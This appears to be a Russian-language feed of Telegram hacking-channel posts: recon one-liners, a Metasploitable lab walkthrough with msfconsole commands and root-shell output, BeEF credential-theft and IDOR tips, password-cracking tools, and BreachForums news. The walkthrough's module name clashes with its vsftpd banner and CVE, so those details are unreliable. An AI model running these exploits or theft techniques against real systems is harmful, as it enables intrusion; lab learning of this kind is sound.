Новый ролик уже на канале 👇🏻
https://m.youtube.com/watch?v=E7KFVT5ELtY
https://m.youtube.com/watch?v=E7KFVT5ELtY
YouTube
ВЗЛОМ ЧЕРЕЗ ССЫЛКУ Beef-XSS | Kali Linux Parrot OS Termux
В этом ролике я расскажу как вас могут взломать через ссылку с помощью Beef-XSS который уже установлен в Kali Linux.
ТГ КАНАЛ: https://t.me/HelloHackingTeam
ДС СЕРВЕР: https://discord.gg/Eg8aDS7Hn7
Стикеры из ролика:
https://t.me/addstickers/Social_Engineering
ТГ КАНАЛ: https://t.me/HelloHackingTeam
ДС СЕРВЕР: https://discord.gg/Eg8aDS7Hn7
Стикеры из ролика:
https://t.me/addstickers/Social_Engineering
👍1
Forwarded from Этичный Хакер
Сегодня в этой статье мы рассмотрим одну из наиболее часто используемых сетевых утилит и узнаем, как другие фреймворки используют Netcat для создания сеанса.
#netcat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from PAINtest
Последние три дня багхантил и собрал несколько полезных однострочников для рекона и поиска базовых уязвимостей.
Для поиска поддоменов:
https://github.com/dwisiswant0/awesome-oneliner-bugbounty
#bugbounty #bugbountytips #recon #tools
Для поиска поддоменов:
curl -s "https://crt.sh/?q=*DOMAIN*&output=json" | jq -r '.[].common_name' | sed 's/\*//g' | sort -uИзвлекаем все URL-ы из APK-файла:
apktool d base.apk -o baseAPK -f; grep -Phro "(https?://)[\w\,-/]+[\"\']" baseAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"Проверка корректности CORS:
curl -s -I -H "Origin: yourdomain.com" -H "Access-Control-Request-Method: GET" -H "Access-Control-Request-Headers: X-Requested-With" -X OPTIONS https://example.comА затем обнаружил, что существует репозиторий, содержащий не один десяток подобных полезных скриптов, пользуйтесь на здоровье :)
https://github.com/dwisiswant0/awesome-oneliner-bugbounty
#bugbounty #bugbountytips #recon #tools
GitHub
GitHub - dwisiswant0/awesome-oneliner-bugbounty: A collection of awesome one-liner scripts especially for bug bounty tips.
A collection of awesome one-liner scripts especially for bug bounty tips. - dwisiswant0/awesome-oneliner-bugbounty
🤔1
Forwarded from Этичный Хакер
Полный дамп базы данных и получения данных пользователей с помощью Error Based SQL и обхода защиты веб приложения.
#Web #SQL |
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Этичный Хакер
log4shell.gif
5.1 KB
В статье представлен поиск однажды нашумевшей уязвимости Log4shell на одном из сервисов Google.
#Web #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Этичный Хакер
В статье представлен полный гайд по тестированию на проникновение базы данных с помощью инструмента sqlmap.
#Web #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
В США арестовали владельца популярного киберпреступного портала BreachForums
Правоохранительные органы США арестовали 15 марта жителя Нью-Йорка, предположительно Помпомпурина, владельца хакерского форума BreachForums. Согласно судебным документам , ему было предъявлено обвинение в сговоре с целью склонения физических лиц к продаже устройств несанкционированного доступа.
По данным сотрудников ФБР, во время ареста подсудимый признался, что его настоящее имя Коннор Брайан Фитцпатрик, и что он — Помпомпурин, владелец форума киберпреступного форума BreachForums.
16 марта Фитцпатрик был освобожден под залог в размере 300 тысяч долларов. Он предстанет перед Окружным судом Восточного округа Вирджинии 24 марта. Помпомпурин сдал свои документы, сейчас ему разрешено перемещаться только в пределах Южного и Восточного округов Нью-Йорка и Восточного округа Вирджинии. Ему также запрещено контактировать со свидетелями, сообвиняемыми или сообщниками.
Один из администраторов BreachForums уже заявил, что сайт продолжит работать в штатном режиме несмотря на ситуацию с Помпомпурином. По его словам, полный доступ к инфраструктуре сайта есть не только у его владельца, но и у остальных администраторов.
Помпомпурин был известным игроком в киберпреступном подполье, занимающимся взломом компаний, а также сливом и продажей украденных данных через форумы и социальные сети. Он также был известным участником киберпреступного форума RaidForums, захваченным ФБР в 2022 году.
Именно после деактивации RaidForums Фитцпатрик создал портал BreachForums, который очень быстро стал крупнейшим в своем роде форумом по утечке данных. Портал активно используется хакерами и бандами вымогателей для слива и продажи украденных данных. В одном только марте мы писали о сливе данных одного из крупнейших немецких банков , а также о массивной 160 гигабайтной утечке внутренней информации Acer.
Правоохранительные органы США арестовали 15 марта жителя Нью-Йорка, предположительно Помпомпурина, владельца хакерского форума BreachForums. Согласно судебным документам , ему было предъявлено обвинение в сговоре с целью склонения физических лиц к продаже устройств несанкционированного доступа.
По данным сотрудников ФБР, во время ареста подсудимый признался, что его настоящее имя Коннор Брайан Фитцпатрик, и что он — Помпомпурин, владелец форума киберпреступного форума BreachForums.
16 марта Фитцпатрик был освобожден под залог в размере 300 тысяч долларов. Он предстанет перед Окружным судом Восточного округа Вирджинии 24 марта. Помпомпурин сдал свои документы, сейчас ему разрешено перемещаться только в пределах Южного и Восточного округов Нью-Йорка и Восточного округа Вирджинии. Ему также запрещено контактировать со свидетелями, сообвиняемыми или сообщниками.
Один из администраторов BreachForums уже заявил, что сайт продолжит работать в штатном режиме несмотря на ситуацию с Помпомпурином. По его словам, полный доступ к инфраструктуре сайта есть не только у его владельца, но и у остальных администраторов.
Помпомпурин был известным игроком в киберпреступном подполье, занимающимся взломом компаний, а также сливом и продажей украденных данных через форумы и социальные сети. Он также был известным участником киберпреступного форума RaidForums, захваченным ФБР в 2022 году.
Именно после деактивации RaidForums Фитцпатрик создал портал BreachForums, который очень быстро стал крупнейшим в своем роде форумом по утечке данных. Портал активно используется хакерами и бандами вымогателей для слива и продажи украденных данных. В одном только марте мы писали о сливе данных одного из крупнейших немецких банков , а также о массивной 160 гигабайтной утечке внутренней информации Acer.
Forwarded from Kali Linux
Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.
Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.
#Metasploitable
Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.
#Дисклеймер
Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!
А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.
Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.
#Nmap
Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.
Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он - 192.168.1.131.
#Начало сканирования
Пишем в kali linux следующую компанду:
💣sudo nmap -sV -Pn --script vulners 192.168.1.131
Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.
Флаг Pn означает, что мы не отправим ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.
#Выбор уязвимости
Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.
#msfconsole
Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:
💣search ftp
💣use exploit unix/ftp/proftpd133cbackdoorВыбираем полезную нагрузку. Я выбрал cmd/unix/interact.
💣
Set payload payload/cmd/interact.
💣set RHOSTS 192.168.1.131Тут как вы понимаете ip metasploitable в локалке.
💣Exploit
И видим следующее:
192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)
* 192.168.1.131:21 - USER: 331 Please specify the password.
+ 192.168.1.131:21 - Backdoor service has been spawned, handling...
+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)
* Found shell.
* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)И вот у вас есть обратная оболочка. Причем она даже root оболочка! Так что никаких повышений привилегий не надо.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Этичный Хакер
😈 Hakrawler - быстрый CLI веб-сканер для хакеров
В этой статье рассмотрим инструмент, являющимся быстрым веб-сканер golang для сбора URL-адресов и местоположений файлов JavaScript.
➖ https://telegra.ph/Hakrawler---bystryj-CLI-veb-skaner-dlya-hakerov-03-21
#Web #CLI
В этой статье рассмотрим инструмент, являющимся быстрым веб-сканер golang для сбора URL-адресов и местоположений файлов JavaScript.
➖ https://telegra.ph/Hakrawler---bystryj-CLI-veb-skaner-dlya-hakerov-03-21
#Web #CLI
Forwarded from GreyTeam | Хакеры
«Zydra – это инструмент, который может восстанавливать пароли от файлов и shadow файлов (shadow файл хранит пароли пользователей в системе Linux) Linux с помощью перебора или атаки по словарю.»
#pentest
https://telegra.ph/Legkij-vzlom-parolej-ZIP-fajlov-s-pomoshchyu-Zydra-03-28
#pentest
https://telegra.ph/Legkij-vzlom-parolej-ZIP-fajlov-s-pomoshchyu-Zydra-03-28
Telegraph
Легкий взлом паролей ZIP-файлов с помощью Zydra
Zydra – это инструмент, который может восстанавливать пароли от файлов и shadow файлов Linux с помощью перебора или атаки по словарю. То есть, он может взламывать пароли файлов ZIP, RAR и PDF. Также он может восстанавливать пароли систем Linux с помощью shadow…
👍1
Forwarded from RESOLUTE ATTACK
This media is not supported in your browser
VIEW IN TELEGRAM
Active Scan++
HTTP Request Smuggler
JSON Beautifier
Sitemap Extractor
Param-Miner
JSON Web Tokens
Autorize
Retire-JS
Param Miner
BurpJSLinkFinder
BurpBounty
domain_hunter
Turbo Intruder
RESOLUTE ATTACK
#Разное #BurpSuite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Social Engineering
• Хакеры начинают искать уязвимые эндпоинты уже через 15 минут, после раскрытия данных о CVE. Дело в том, что они постоянно мониторят сообщения от поставщиков и производителей ПО в поисках объявлений о новых уязвимостях, которые можно было бы использовать для начального доступа к корпоративной сети или удаленного выполнения кода.
🖖🏻 Приветствую тебя user_name.
• Часто нужно узнать всю информацию о какой-нибудь уязвимости: насколько найденный баг критичен, есть ли готовые сплоиты, какие вендоры уже выпустили патчи, каким сканером проверить наличие бага в системе и т.д. Для этих потребностей есть не мало инструментов и *ресурсов, о которых ты сегодня узнаешь:• MITRE CVE — база данных, поисковик и классификатор уязвимостей.
• opencve.io — поисковик CVE с функционалом оповещений о новых угрозах.
• Vulnerability Database — ресурс для поиска информации об актуальных угрозах.
• sploitus — поисковик по эксплойтам и необходимым инструментам инструментам.
• CVE Trends — ресурс, который отслеживает популярность CVE в реальном времени.
• GitHub Advisory Database — БД уязвимостей, включающая CVE и рекомендации по безопасности.
• Exploit DB — CVE-совместимый архив общедоступных эксплойтов и уязвимого программного обеспечения.
• Cloudvulndb — проект, который аккумулирует уязвимости и проблемы безопасности поставщиков облачных услуг.
• CVEDetails, osv.dev, VulDB, maltiverse — источники данных об уязвимостях и индикаторах компрометации.
• security.snyk.io и Mend Vulnerability Database, Vulncode-DB — БД уязвимостей с открытым исходным кодом.
• Rapid7 - DB — база данных, которая содержит детали более чем 180 тыс. уязвимостей и 4 тыс. эксплойтов. Все эксплойты включены в Metasploit.
*Список ресурсов не претендует на полноту.
S.E. ▪️ S.E.Relax ▪️ infosec.work
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1
Новый ролик уже на канале!
Торопись! Ссылка 👇🏻
https://youtu.be/oatEzIQHvlY
Напишите комментарии, как вам такая подача!
Торопись! Ссылка 👇🏻
https://youtu.be/oatEzIQHvlY
Напишите комментарии, как вам такая подача!
YouTube
РАЗВЕДКА, ДЕАНОН В ИНТЕРНЕТЕ : OSINT, VENATOR | Kali Linux Parrot OS Termux
В этом видео мы поговорим про разведку и пробив в интернете. Как найти своего старого друга :)
ТГ КАНАЛ: https://t.me/HelloHackingTeam
ДС СЕРВЕР: https://discord.gg/Eg8aDS7Hn7
ТГ КАНАЛ: https://t.me/HelloHackingTeam
ДС СЕРВЕР: https://discord.gg/Eg8aDS7Hn7
👍1
Forwarded from Kali Linux
Не много отойдём от темы уязвимостей и поговорим про классный сканер уязвимостей веб приложений под названием Zap.
#Дисклеймер
Но перед тем как мы начнем. Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!
#FAQ
OWASP Zap - это среда тестирования безопасности, очень похожая на Burp Suite. Он действует как очень надежный инструмент для подсчета. Он используется для тестирования веб-приложений.
Почему бы мне не использовать Burp Suite?
Это хороший вопрос! Большинство людей в сообществе Info-sec ДЕЙСТВИТЕЛЬНО используют Burp Suite. Но OWASP ZAP имеет несколько преимуществ и функций, которых нет в Burp Suite, и это моя предпочтительная программа из двух.
#Преимущества OWASP ZAP?
Это полностью открытый исходный код и бесплатный. Нет премиум-версии, никаких функций, заблокированных за платный доступ, и нет проприетарного кода.
#Установка
OWASP ZAP имеет удобный установщик для систем Windows, Mac OS и Linux.
Скачайте и установите с официального сайта: https://www.zaproxy.org/download/
#Автоматичесское сканирование
Автоматическое сканирование позволяет нам выявить базовые уязвимости в веб приложении. Смысл в том, чтобы данное программное обеспечение помогло вам увидеть ни только уязвимости но и карту сайта.
ZAP сканирует сайт с помощью "Паука" и даже имеет возможность работать через прокси. Произвести автоматическое сканирование легко. Для этого достаточно просто нажать на кнопку "Automated Scan" вставить ссылку на нужный сайт в специальное окно и нажать Start.
#Ручное сканирование
Мы можем просканировать сайт в ручную, просто настроив прокси сервер однако для этого надо так-же как и в Burp Suite скачать ZAP сертификат и импортировать его в наш браузер.
На этом пока все. Скоро расскажу вам про особенные фишки ZAP и почему он немного больше чем просто сканнер.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Kali Linux
SpiderFoot – инструмент OSINT что автоматизирует анализ угроз и отображение поверхности атаки
Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
🖥 Github
@linuxkalii
Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Этичный Хакер
В этой статье будем применять как взлом BEeF, так и социальную инженерию для кражи учетных данных из браузера нашей цели.
#BEeF |
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Этичный Хакер
У большинства API есть конечная точка для создания, удаления, обновления и чтения объекта или группы объектов.
Если вы видите:
DELETE /api/item/32 (удаление)
То попробуйте:POST /api/item (создание)
GET /api/item/33 (чтение)
PUT /api/item/33 (обновление)
Затем протестируйте каждый из них на IDOR, поочередно проверяя аутентификацию и уровни доступа к различным объектам. Методологическое тестирование - лучший способ взломать API.Иногда тестирование API усложняется тем, что мы можем не знать нужные для запроса поля или параметры. Однако есть способы найти их, например: если вы знаете поля для GET, вы так же можете отправить и PUT, изменив некоторые значения.
Кроме того, есть инструменты, такие как Arjun, которые могут находить параметры, а иногда и сами API просто возвращают сообщения об ошибках, когда какой-то из параметров отсутствует.
#Web #API #IDOR
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1